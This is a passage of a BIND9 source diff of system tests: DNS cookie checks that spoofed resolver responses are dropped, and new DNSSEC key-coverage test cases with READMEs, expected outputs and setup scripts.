+n=`expr $n + 1` +echo_i "check that test server is correctly configured ($n)" +ret=0 +pat="; COOKIE: ................................ (good)" +#UDP +$DIG $DIGOPTS @10.53.0.9 +notcp tld > dig.out.test$n.1 +grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 +grep "$pat" dig.out.test$n.1 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.1 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.1 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +notcp tcponly.tld > dig.out.test$n.2 +grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 +grep "; COOKIE:" dig.out.test$n.2 > /dev/null && ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null || ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +notcp nocookie.tld > dig.out.test$n.3 +grep "status: NOERROR" dig.out.test$n.3 > /dev/null || ret=1 +grep "; COOKIE:" dig.out.test$n.3 > /dev/null && ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.3 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.3 > /dev/null || ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +notcp withtsig.tld > dig.out.test$n.4 +grep "status: NOERROR" dig.out.test$n.4 > /dev/null || ret=1 +grep "; COOKIE:" dig.out.test$n.4 > /dev/null && ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.4 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.4 > /dev/null || ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.4 > /dev/null || ret=1 + +#TCP +$DIG $DIGOPTS @10.53.0.9 +tcp tld > dig.out.test$n.5 +grep "status: NOERROR" dig.out.test$n.5 > /dev/null || ret=1 +grep "$pat" dig.out.test$n.5 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.5 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.5 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +tcp tcponly.tld > dig.out.test$n.6 +grep "status: NOERROR" dig.out.test$n.6 > /dev/null || ret=1 +grep "$pat" dig.out.test$n.6 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.6 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.6 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +tcp nocookie.tld > dig.out.test$n.7 +grep "status: NOERROR" dig.out.test$n.7 > /dev/null || ret=1 +grep "; COOKIE:" dig.out.test$n.7 > /dev/null && ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.7 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.7 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.1 > /dev/null && ret=1 + +$DIG $DIGOPTS @10.53.0.9 +tcp withtsig.tld > dig.out.test$n.8 +grep "status: NOERROR" dig.out.test$n.8 > /dev/null || ret=1 +grep "$pat" dig.out.test$n.8 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.8 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.8 > /dev/null && ret=1 +grep ";; TSIG PSEUDOSECTION:" dig.out.test$n.8 > /dev/null && ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that spoofed response is dropped when we have a server cookie ($n)" +ret=0 +msg="missing expected cookie from" +pat='10\.53\.0\.9 .*\[cookie=................................\] \[ttl' +# prime EDNS COOKIE state +$DIG $DIGOPTS @10.53.0.1 tld > dig.out.test$n.1 +grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 +rndc_dumpdb ns1 +grep "$pat" ns1/named_dump.db.test$n > /dev/null || ret=1 +# spoofed response contains 10.53.0.10 +nextpart ns1/named.run >/dev/null +$DIG $DIGOPTS @10.53.0.1 tcponly.tld > dig.out.test$n.2 +wait_for_log 5 "$msg" ns1/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that gracefully handle server disabling DNS COOKIE we have a server cookie ($n)" +ret=0 +msg="missing expected cookie from" +pat='10\.53\.0\.9 .*\[cookie=................................\] \[ttl' +# prime EDNS COOKIE state +$DIG $DIGOPTS @10.53.0.1 tld > dig.out.test$n.1 +grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 +rndc_dumpdb ns1 +grep "$pat" ns1/named_dump.db.test$n > /dev/null || ret=1 +# check the disabled server response +nextpart ns1/named.run >/dev/null +$DIG $DIGOPTS @10.53.0.1 nocookie.tld > dig.out.test$n.2 +wait_for_log 5 "$msg" ns1/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that spoofed response with a TSIG is dropped when we have a server cookie ($n)" +ret=0 +pat='10\.53\.0\.9 .*\[cookie=................................\] \[ttl' +# prime EDNS COOKIE state +$DIG $DIGOPTS @10.53.0.1 tld > dig.out.test$n.1 +grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 +rndc_dumpdb ns1 +grep "$pat" ns1/named_dump.db.test$n > /dev/null || ret=1 +# spoofed response contains 10.53.0.10 +nextpart ns1/named.run >/dev/null +$DIG $DIGOPTS @10.53.0.1 withtsig.tld > dig.out.test$n.2 +grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null && ret=1 +nextpart ns1/named.run > named.run.test$n +count=$(grep -c ') [0-9][0-9]* NOERROR 0' named.run.test$n) +test $count -eq 1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if $PYTHON -c ' +import dns.version, sys; +if dns.version.MAJOR > 1: sys.exit(0); +if dns.version.MAJOR == 1 and dns.version.MINOR >= 16: sys.exit(0); +sys.exit(1)' +then + n=`expr $n + 1` + echo_i "check that TSIG test server is correctly configured ($n)" + ret=0 + pat="; COOKIE: ................................ (good)" + key=hmac-sha256:foo:aaaaaaaaaaaa + #UDP + $DIG $DIGOPTS @10.53.0.10 -y $key +notcp tsig. > dig.out.test$n.1 + grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 + grep "$pat" dig.out.test$n.1 > /dev/null || ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.1 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.1 > /dev/null && ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + $DIG $DIGOPTS @10.53.0.10 -y $key +notcp tcponly.tsig > dig.out.test$n.2 + grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 + grep "; COOKIE:" dig.out.test$n.2 > /dev/null && ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null || ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + $DIG $DIGOPTS @10.53.0.10 -y $key +notcp nocookie.tsig > dig.out.test$n.3 + grep "status: NOERROR" dig.out.test$n.3 > /dev/null || ret=1 + grep "; COOKIE:" dig.out.test$n.3 > /dev/null && ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.3 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.3 > /dev/null || ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + #TCP + $DIG $DIGOPTS @10.53.0.10 -y $key +tcp tsig. > dig.out.test$n.5 + grep "status: NOERROR" dig.out.test$n.5 > /dev/null || ret=1 + grep "$pat" dig.out.test$n.5 > /dev/null || ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.5 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.5 > /dev/null && ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + $DIG $DIGOPTS @10.53.0.10 -y $key +tcp tcponly.tsig > dig.out.test$n.6 + grep "status: NOERROR" dig.out.test$n.6 > /dev/null || ret=1 + grep "$pat" dig.out.test$n.6 > /dev/null || ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.6 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.6 > /dev/null && ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + $DIG $DIGOPTS @10.53.0.10 -y $key +tcp nocookie.tsig > dig.out.test$n.7 + grep "status: NOERROR" dig.out.test$n.7 > /dev/null || ret=1 + grep "; COOKIE:" dig.out.test$n.7 > /dev/null && ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.7 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.7 > /dev/null && ret=1 + grep 'TSIG.*NOERROR' dig.out.test$n.1 > /dev/null || ret=1 + + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + n=`expr $n + 1` + echo_i "check that missing COOKIE with a valid TSIG signed response does not trigger TCP fallback ($n)" + ret=0 + pat='10\.53\.0\.10 .*\[cookie=................................\] \[ttl' + # prime EDNS COOKIE state + $DIG $DIGOPTS @10.53.0.1 tsig. > dig.out.test$n.1 + grep "status: NOERROR" dig.out.test$n.1 > /dev/null || ret=1 + rndc_dumpdb ns1 + grep "$pat" ns1/named_dump.db.test$n > /dev/null || ret=1 + # check the disabled server response + nextpart ns1/named.run >/dev/null + $DIG $DIGOPTS @10.53.0.1 nocookie.tsig > dig.out.test$n.2 + grep "status: NOERROR" dig.out.test$n.2 > /dev/null || ret=1 + grep 'A.10\.53\.0\.9' dig.out.test$n.2 > /dev/null || ret=1 + grep 'A.10\.53\.0\.10' dig.out.test$n.2 > /dev/null || ret=1 + nextpart ns1/named.run > named.run.test$n + count=$(grep -c ') [0-9][0-9]* NOERROR 0' named.run.test$n) + test $count -eq 2 || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/coverage/01-ksk-inactive/README b/bin/tests/system/coverage/01-ksk-inactive/README new file mode 100644 index 0000000..8102593 --- /dev/null +++ b/bin/tests/system/coverage/01-ksk-inactive/README @@ -0,0 +1,10 @@ +This set includes one KSK rollover. The KSK is deactivated prior to +its replacement being activated. Tool output should resemble: + +Checking KSK events for zone example.com, algorithm 7: +ERROR: After 2012-31-Jul (20:59:14): + Inactive: example.com/007/45435 (KSK) +No KSK's are active + +Checking ZSK events for zone example.com, algorithm 7: +OK diff --git a/bin/tests/system/coverage/01-ksk-inactive/expect b/bin/tests/system/coverage/01-ksk-inactive/expect new file mode 100644 index 0000000..3d342b1 --- /dev/null +++ b/bin/tests/system/coverage/01-ksk-inactive/expect @@ -0,0 +1,6 @@ +args="-d 1h -m 2h" +warn=0 +error=1 +ok=1 +retcode=1 +match="No KSK's are active" diff --git a/bin/tests/system/coverage/02-zsk-inactive/README b/bin/tests/system/coverage/02-zsk-inactive/README new file mode 100644 index 0000000..5d3fed1 --- /dev/null +++ b/bin/tests/system/coverage/02-zsk-inactive/README @@ -0,0 +1,10 @@ +This set includes one ZSK rollover. The first ZSK is deactivated +prior to its replacement being activated. Tool output should resemble: + +Checking KSK events for zone example.com, algorithm 7: +OK + +Checking ZSK events for zone example.com, algorithm 7: +ERROR: After 2012-05-Dec (20:39:32): + Inactive: example.com/005/08376 (ZSK) +No ZSK's are active diff --git a/bin/tests/system/coverage/02-zsk-inactive/expect b/bin/tests/system/coverage/02-zsk-inactive/expect new file mode 100644 index 0000000..a905b58 --- /dev/null +++ b/bin/tests/system/coverage/02-zsk-inactive/expect @@ -0,0 +1,6 @@ +args="-d 1h -m 2h" +warn=0 +error=1 +ok=1 +retcode=1 +match="No ZSK's are active" diff --git a/bin/tests/system/coverage/03-ksk-unpublished/README b/bin/tests/system/coverage/03-ksk-unpublished/README new file mode 100644 index 0000000..7d8a301 --- /dev/null +++ b/bin/tests/system/coverage/03-ksk-unpublished/README @@ -0,0 +1,10 @@ +This set contains one KSK rollover. The KSK is unpublished before its +successor is published. Tool output should resemble: + +Checking KSK events for zone example.com, algorithm 7: +ERROR: After 2012-06-Oct (21:07:57): + Delete: example.com/007/23040 (KSK) +No KSK's are published + +Checking ZSK events for zone example.com, algorithm 7: +OK diff --git a/bin/tests/system/coverage/03-ksk-unpublished/expect b/bin/tests/system/coverage/03-ksk-unpublished/expect new file mode 100644 index 0000000..07bbff1 --- /dev/null +++ b/bin/tests/system/coverage/03-ksk-unpublished/expect @@ -0,0 +1,8 @@ +args="-d 1h -m 2h" +warn=1 +error=1 +ok=1 +retcode=1 +match="WARNING: Key .* (KSK) is scheduled for +deletion before inactivation +No KSK's are published" diff --git a/bin/tests/system/coverage/04-zsk-unpublished/README b/bin/tests/system/coverage/04-zsk-unpublished/README new file mode 100644 index 0000000..5077abf --- /dev/null +++ b/bin/tests/system/coverage/04-zsk-unpublished/README @@ -0,0 +1,10 @@ +This set contains one ZSK rollover. The ZSK is unpublished before its +successor is published. Tool output should resemble: + +Checking KSK events for zone example.com, algorithm 7: +OK + +Checking ZSK events for zone example.com, algorithm 7: +ERROR: After 2012-06-Oct (21:13:45): + Delete: example.com/007/25967 (ZSK) +No ZSK's are published diff --git a/bin/tests/system/coverage/04-zsk-unpublished/expect b/bin/tests/system/coverage/04-zsk-unpublished/expect new file mode 100644 index 0000000..450ec24 --- /dev/null +++ b/bin/tests/system/coverage/04-zsk-unpublished/expect @@ -0,0 +1,8 @@ +args="-d 1h -m 2h" +warn=1 +error=1 +ok=1 +retcode=1 +match="WARNING: Key .* (ZSK) is scheduled for +deletion before inactivation +No ZSK's are published" diff --git a/bin/tests/system/coverage/05-ksk-unpub-active/README b/bin/tests/system/coverage/05-ksk-unpub-active/README new file mode 100644 index 0000000..119c1b2 --- /dev/null +++ b/bin/tests/system/coverage/05-ksk-unpub-active/README @@ -0,0 +1,12 @@ +This set includes one KSK rollover. The first KSK is deleted +and its successor published prior to the first KSK being deactivated +and its successor activated. Tool output should resemble: + +Checking KSK events for zone example.com, algorithm 7: +ERROR: After 2012-05-Dec (21:22:19): + Delete: example.com/007/06219 (KSK) + Publish: example.com/007/20559 (KSK) +No KSK's are both active and published + +Checking ZSK events for zone example.com, algorithm 7: +OK diff --git a/bin/tests/system/coverage/05-ksk-unpub-active/expect b/bin/tests/system/coverage/05-ksk-unpub-active/expect new file mode 100644 index 0000000..2edfa0e --- /dev/null +++ b/bin/tests/system/coverage/05-ksk-unpub-active/expect @@ -0,0 +1,8 @@ +args="-d 1h -m 2h" +warn=1 +error=1 +ok=1 +retcode=1 +match="WARNING: Key .* (KSK) is scheduled for +deletion before inactivation +No KSK's are both active and published" diff --git a/bin/tests/system/coverage/06-zsk-unpub-active/README b/bin/tests/system/coverage/06-zsk-unpub-active/README new file mode 100644 index 0000000..84833f8 --- /dev/null +++ b/bin/tests/system/coverage/06-zsk-unpub-active/README @@ -0,0 +1,12 @@ +This set includes one KSK rollover. The first KSK is deleted +and its successor published prior to the first KSK being deactivated +and its successor activated. Tool output should resemble: + +Checking KSK events for zone example.com, algorithm 7: +OK + +Checking ZSK events for zone example.com, algorithm 7: +ERROR: After 2012-05-Dec (20:44:18): + Delete: example.com/007/26369 (ZSK) + Publish: example.com/007/21029 (ZSK) +No ZSK's are both active and published diff --git a/bin/tests/system/coverage/06-zsk-unpub-active/expect b/bin/tests/system/coverage/06-zsk-unpub-active/expect new file mode 100644 index 0000000..0ef5b15 --- /dev/null +++ b/bin/tests/system/coverage/06-zsk-unpub-active/expect @@ -0,0 +1,8 @@ +args="-d 1h -m 2h" +warn=1 +error=1 +ok=1 +retcode=1 +match="WARNING: Key .* (ZSK) is scheduled for +deletion before inactivation +No ZSK's are both active and published" diff --git a/bin/tests/system/coverage/07-ksk-ttl/README b/bin/tests/system/coverage/07-ksk-ttl/README new file mode 100644 index 0000000..2659099 --- /dev/null +++ b/bin/tests/system/coverage/07-ksk-ttl/README @@ -0,0 +1,4 @@ +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. + +Expected tool output TBD. diff --git a/bin/tests/system/coverage/07-ksk-ttl/expect b/bin/tests/system/coverage/07-ksk-ttl/expect new file mode 100644 index 0000000..eade21a --- /dev/null +++ b/bin/tests/system/coverage/07-ksk-ttl/expect @@ -0,0 +1,9 @@ +args="-d 1w -m 2w" +warn=1 +error=0 +ok=2 +retcode=0 +match="WARNING: Key .* (KSK) is activated too soon +after publication +Activation should be at least 7 days after +publication." diff --git a/bin/tests/system/coverage/08-zsk-ttl/README b/bin/tests/system/coverage/08-zsk-ttl/README new file mode 100644 index 0000000..2659099 --- /dev/null +++ b/bin/tests/system/coverage/08-zsk-ttl/README @@ -0,0 +1,4 @@ +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. + +Expected tool output TBD. diff --git a/bin/tests/system/coverage/08-zsk-ttl/expect b/bin/tests/system/coverage/08-zsk-ttl/expect new file mode 100644 index 0000000..150c9cd --- /dev/null +++ b/bin/tests/system/coverage/08-zsk-ttl/expect @@ -0,0 +1,9 @@ +args="-d 1w -m 2w" +warn=1 +error=0 +ok=2 +retcode=0 +match="WARNING: Key .* (ZSK) is activated too soon +after publication +Activation should be at least 7 days after +publication." diff --git a/bin/tests/system/coverage/09-check-zsk/README b/bin/tests/system/coverage/09-check-zsk/README new file mode 100644 index 0000000..bc5edc8 --- /dev/null +++ b/bin/tests/system/coverage/09-check-zsk/README @@ -0,0 +1,6 @@ +This set includes one KSK rollover. The KSK is deactivated prior to +its replacement being activated; however, as we are only checking ZSK's, +we should not detect the error. Tool output should resemble: + +Checking ZSK events for zone example.com, algorithm 7: +OK diff --git a/bin/tests/system/coverage/09-check-zsk/expect b/bin/tests/system/coverage/09-check-zsk/expect new file mode 100644 index 0000000..d56c4bf --- /dev/null +++ b/bin/tests/system/coverage/09-check-zsk/expect @@ -0,0 +1,6 @@ +args="-z -d 1h -m 2h" +warn=0 +error=0 +ok=1 +retcode=0 +match="" diff --git a/bin/tests/system/coverage/10-check-ksk/README b/bin/tests/system/coverage/10-check-ksk/README new file mode 100644 index 0000000..948364d --- /dev/null +++ b/bin/tests/system/coverage/10-check-ksk/README @@ -0,0 +1,7 @@ +This set includes one ZSK rollover. The first ZSK is deactivated +prior to its replacement being activated; however, as we are only +checking KSKs, we should not detect the error. Tool output should +resemble: + +Checking KSK events for zone example.com, algorithm 7: +OK diff --git a/bin/tests/system/coverage/10-check-ksk/expect b/bin/tests/system/coverage/10-check-ksk/expect new file mode 100644 index 0000000..a03d2aa --- /dev/null +++ b/bin/tests/system/coverage/10-check-ksk/expect @@ -0,0 +1,6 @@ +args="-k -d 1h -m 2h" +warn=0 +error=0 +ok=1 +retcode=0 +match="" diff --git a/bin/tests/system/coverage/11-cutoff/README b/bin/tests/system/coverage/11-cutoff/README new file mode 100644 index 0000000..8102593 --- /dev/null +++ b/bin/tests/system/coverage/11-cutoff/README @@ -0,0 +1,10 @@ +This set includes one KSK rollover. The KSK is deactivated prior to +its replacement being activated. Tool output should resemble: + +Checking KSK events for zone example.com, algorithm 7: +ERROR: After 2012-31-Jul (20:59:14): + Inactive: example.com/007/45435 (KSK) +No KSK's are active + +Checking ZSK events for zone example.com, algorithm 7: +OK diff --git a/bin/tests/system/coverage/11-cutoff/expect b/bin/tests/system/coverage/11-cutoff/expect new file mode 100644 index 0000000..bdf29d0 --- /dev/null +++ b/bin/tests/system/coverage/11-cutoff/expect @@ -0,0 +1,6 @@ +args="-l 1y -d 1h -m 2h" +warn=0 +error=0 +ok=2 +retcode=0 +match="" diff --git a/bin/tests/system/coverage/12-ksk-deletion/expect b/bin/tests/system/coverage/12-ksk-deletion/expect new file mode 100644 index 0000000..898c0bf --- /dev/null +++ b/bin/tests/system/coverage/12-ksk-deletion/expect @@ -0,0 +1,6 @@ +args= +warn=4 +error=1 +ok=1 +retcode=1 +match=0 diff --git a/bin/tests/system/coverage/13-dotted-dotless/expect b/bin/tests/system/coverage/13-dotted-dotless/expect new file mode 100644 index 0000000..5760d29 --- /dev/null +++ b/bin/tests/system/coverage/13-dotted-dotless/expect @@ -0,0 +1,7 @@ +args="-z -m2h" +warn=0 +error=0 +ok=2 +retcode=0 +match= +zones="one.example. two.example" diff --git a/bin/tests/system/coverage/clean.sh b/bin/tests/system/coverage/clean.sh new file mode 100644 index 0000000..5527946 --- /dev/null +++ b/bin/tests/system/coverage/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f named-compilezone +rm -f */K*.key +rm -f */K*.private +rm -rf coverage.* +rm -rf dotted-dotless +rm -f ns*/named.lock diff --git a/bin/tests/system/coverage/setup.sh b/bin/tests/system/coverage/setup.sh new file mode 100644 index 0000000..7de73b8 --- /dev/null +++ b/bin/tests/system/coverage/setup.sh @@ -0,0 +1,119 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +ln -s $CHECKZONE named-compilezone + +# Test 1: KSK goes inactive before successor is active +dir=01-ksk-inactive +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +$SETTIME -K $dir -I +7mo $ksk1 > /dev/null 2>&1 +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 2: ZSK goes inactive before successor is active +dir=02-zsk-inactive +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +$SETTIME -K $dir -I +7mo $zsk1 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 3: KSK is unpublished before its successor is published +dir=03-ksk-unpublished +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +$SETTIME -K $dir -D +6mo $ksk1 > /dev/null 2>&1 +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 4: ZSK is unpublished before its successor is published +dir=04-zsk-unpublished +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +$SETTIME -K $dir -D +6mo $zsk1 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 5: KSK deleted and successor published before KSK is deactivated +# and successor activated. +dir=05-ksk-unpub-active +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +8mo $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 6: ZSK deleted and successor published before ZSK is deactivated +# and successor activated. +dir=06-zsk-unpub-active +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +8mo $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 7: KSK rolled with insufficient delay after prepublication. +dir=07-ksk-ttl +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +# allow only 1 day between publication and activation +$SETTIME -K $dir -P +269d $ksk2 > /dev/null 2>&1 +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 8: ZSK rolled with insufficient delay after prepublication. +dir=08-zsk-ttl +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +# allow only 1 day between publication and activation +$SETTIME -K $dir -P +269d $zsk2 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 9: KSK goes inactive before successor is active, but checking ZSKs +dir=09-check-zsk +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +$SETTIME -K $dir -I +7mo $ksk1 > /dev/null 2>&1 +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 10: ZSK goes inactive before successor is active, but checking KSKs +dir=10-check-ksk +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +$SETTIME -K $dir -I +7mo $zsk1 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 11: ZSK goes inactive before successor is active, but after cutoff +dir=11-cutoff +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +18mo -D +2y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +$SETTIME -K $dir -I +16mo $zsk1 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 12: Too early KSK deletion +dir=12-ksk-deletion +ksk1=$($KEYGEN -q -K $dir -f KSK -a 8 -b 2048 -I +40d -D +40d example.com) +ksk2=$($KEYGEN -q -K $dir -S $ksk1.key example.com) + +# Test 13: check names with/without dots at the end +dir=13-dotted-dotless +zsk1=$($KEYGEN -q -K $dir -a rsasha256 one.example) +zsk2=$($KEYGEN -q -K $dir -a rsasha256 two.example) diff --git a/bin/tests/system/coverage/tests.sh b/bin/tests/system/coverage/tests.sh new file mode 100644 index 0000000..e0da919 --- /dev/null +++ b/bin/tests/system/coverage/tests.sh @@ -0,0 +1,87 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +COVERAGE="$COVERAGE -c ./named-compilezone" + +status=0 +n=1 + +matchall () { + file=$1 + echo "$2" | while read matchline; do + grep "$matchline" $file > /dev/null 2>&1 || { + echo "FAIL" + return + } + done +} + +echo_i "checking for DNSSEC key coverage issues" +ret=0 +for dir in [0-9][0-9]-*; do + ret=0 + echo_i "$dir" + args= warn= error= ok= 